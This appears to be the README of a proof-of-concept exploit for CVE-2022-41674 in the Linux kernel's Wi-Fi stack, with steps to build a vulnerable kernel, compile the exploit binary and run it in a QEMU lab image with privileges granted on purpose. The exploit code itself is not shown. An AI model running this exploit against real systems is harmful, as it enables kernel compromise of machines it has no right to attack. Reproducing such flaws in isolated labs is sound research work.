Extension of beacown research.
Complete proof-of-concept exploit for CVE-2022-41674 targeting the Linux kernel v5.12-rc4
and v5.14
.
To run the exploit against a target system, you will need to build:
- Linux kernel.
- Exploit binary.
- QEMU disk image.
The instructions below have been tested on a WSL2 Ubuntu 20.04 host system.
Install system dependencies on a host system that will compile the kernel:
# apt install libelf-dev libssl-dev -y
Clone and build the linux kernel with target configuration:
$ git clone --branch v5.12-rc4 git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
$ cp .config linux
$ cd linux
$ make -j `nproc`
Install system dependencies for compiling xpl.c
.
# apt install libnl-3-200
# apt install libnl-genl-3-dev
xpl.c
relies on libpcap version 1.10.1+
so we will need to compile libpcap from source.
$ git clone https://github.com/the-tcpdump-group/libpcap.git
$ git checkout libpcap-1.10.1
$ ./configure
$ make
$ make install
Copy the libpcap library to the system library load path:
# cp ./libpcap.so.1.10.1 /usr/lib/x86_64-linux-gnu/ && ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.10.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1
Compile the xpl
binary file:
$ gcc -o xpl xpl.c $(pkg-config --cflags --libs libnl-3.0 libnl-genl-3.0 libpcap)
A modified version of the syzkaller ./create-image.sh script is used to prepare the target system and copy the xpl
binary and associated poc.pcap
files.
Simply run ./create-image.sh
as sudo and a stretch.img
output file will be produced that is used by the ./run.sh
script.
The target kernel and system can be run using the ./run.sh
script.
Ensure the path to the compiled kernel bzImage
file is correct for your local host system.
You'll need to build the kernel with CONFIG_MAC80211_HWSIM
enabled
CAP_NET_ADMIN
is required. We artificially introduce this permission in ./create-image.sh
by setting /sbin/iw
as root SUID and /xpl
with setcap
.
$ /sbin/iw wlan0 scan trigger && /xpl /poc.pcap /poc2.pcap